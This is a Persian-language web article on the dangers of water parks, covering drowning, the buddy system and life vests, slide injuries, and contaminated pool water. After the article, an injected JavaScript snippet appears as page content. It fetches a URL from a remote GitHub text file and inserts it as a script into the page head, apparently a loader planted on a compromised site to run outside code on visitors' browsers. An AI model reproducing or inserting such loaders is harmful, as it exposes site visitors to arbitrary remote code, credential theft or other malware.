خطرات پارک های آبی

  • سفر به پارک آبی در فصل تابستان می‌تواند یک ماجراجویی خانوادگی یا دوستانه سرگرم‌کننده باشد. چه بخواهید در یک تیوب روی سرسره‌ای با شیب ملایم سر بخورید یا در رودخانه وحشی با امواج تند شنا کنید، سفر به پارک‌های آبی که میلیون‌ها گردشگر را هر سال به سوی خود جذب می‌کند برای هر کس و هر سلیقه‌ای سرگرمی خاصی را پیشنهاد می‌کند. با این حال، این سرگرمی بدون خطر نخواهد بود. آنهایی که به پارک‌های آبی می‌روند باید با دقت قوانین را رعایت کنند و از انجام کارهای خطرآفرین ترین خطرات پارک های آبی و رفتن به موقعیت‌های خطرناک اجتناب کنند تا احتمال بروز رخدادهای ناگوار کمتر شود.

    خطارت پارک های

    خطرات پارک های آبی در رودخانه موج خروشان و استخر شنا کردن

    غرق‌شدگی یکی از بزرگترین تهدیدهایی است که گردشگران کوچکی که به استخر پارک مراجعه می‌کنند را بیشتر از بزرگ‌ترها تحت تأثیر قرار می‌دهد. توانایی شنا کردن یکی از الزامات رفتن به پارک‌های آبی است. قبل از آن که تصمیم بگیرید به پارک آبی بروید، حتماً اطمینان حاصل کنید که همه میهمانان شما که قصد دارند شما را در این گردش ماجراجویانه و سرگرم‌کننده همراهی کنند شنا کردن بلد هستند. توانایی شنا کردن فقط برای سوار شدن در قایق‌ها و راندن آنها نیست. استخر موج، رودخانه‌ها و تونل‌ها گاهی اوقات عمیق و غیر قابل پیش‌بینی یا پر از امواج تند هستند که شناگران ناوارد و آماتور ممکن است از پس آنها برنیایند. یکی از مهم‌ترین روش‌ها برای پیشگیری از خطرات در هنگام شنا استفاده از سیستم رفاقتی است. به عبارت دیگر، اطمینان حاصل کنید که هیچ کدام از همراهان شما به تنهایی شنا نمی‌کنند. در آبی که معلوم نیست عمقش چقدر است یا غریق نجات حضور ندارد شنا نکنید. بسیاری از پارک‌های آبی جلیقه نجات را با قیمت کم یا به طور رایگان در اختیار گردشگران می‌گذارند. اگر در میان همراهان خود کسی را دارید که در مورد توانایی شنا کردنش نگران هستید حتماً از جلیقه نجات برای او استفاده کنید.

    خطرات سرسره‌های آبی در استخر پارک ها

    مهندسان پارک‌های آبی آنها را طوری طراحی می‌کنند که برای استفاده همه ایمن و بی‌خطر و از نظر وزن و قد برای همه متناسب باشد. کودکان یا آنهایی که وزن استاندارد ندارند نباید هیچ کدام از سرسره‌ها و وسایل بازی را امتحان کنند. سرسره‌های آبی بر خلاف ترن‌های متداول معمولاً سرعت تند یا تکیه‌گاه یا پشتیِ سر ندارند. هنگام استفاده از سرسره آبی باید بر روی تشک یا تیوب نشست و روی آب سر خورد. این نوع سواری که آزادی تمام را به همراه دارد پر از خطر نیز هست. مثلاً، ممکن است آنهایی که سرسره‌بازی می‌کنند از روی تیوب یا تشک بیرون بیفتند یا تشک از زیر پایشان در برود که منجر به آسیب‌های بدنی می‌شود. حتی اگر روی تشک هم بمانند باز هم نبودن تکیه‌گاه برای سر می‌تواند منجر به آسیب به گردن یا ضربه به سر شود. برای جلوگیری از برخورد با سرسره‌سواران دیگر یا آسیب‌های بدنی که همه آنها به دلیل عدم رعایت دقیق قوانین رخ می‌دهد، همه گردشگران وظیفه دارند که مقررات سوار شدن بر هر وسیله بازی یا سرگرمی را مو به مو دنبال کنند.

    خطارت پارک های

    خطرات آب استخر پارک ها

    در موارد نادر، میهمانان پارک‌های آبی در معرض آب آلوده قرار می‌گیرند. بیماری‌های ناشی از آب به سادگی در چنین مواردی سرایت می‌کند. بیشترین دلیل آلودگی آب کودکان هستند که دستشویی رفتن را یاد نگرفته‌اند یا پوشک‌های مخصوص نمی‌پوشند. پارک‌های آبی طول زیادی دارند که احتمال رواج بیماری‌های ناشی از آب بسیار کم است؛ البته اگر قوانین حفظ سلامت عمومی به خوبی اجرا شود و آب همیشه تمیز و تصفیه‌شده باشد. با این حال، احتمال آلودگی امکان دارد. میهمانان می‌توانند با شست‌وشوی دست‌هایشان بعد از تماس با آب‌های کم‌عمق یا راکد و اطمینان از نبلعیدن هیچ آبی از ابتلا به بیماری‌های آب پیشگیری کنند.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید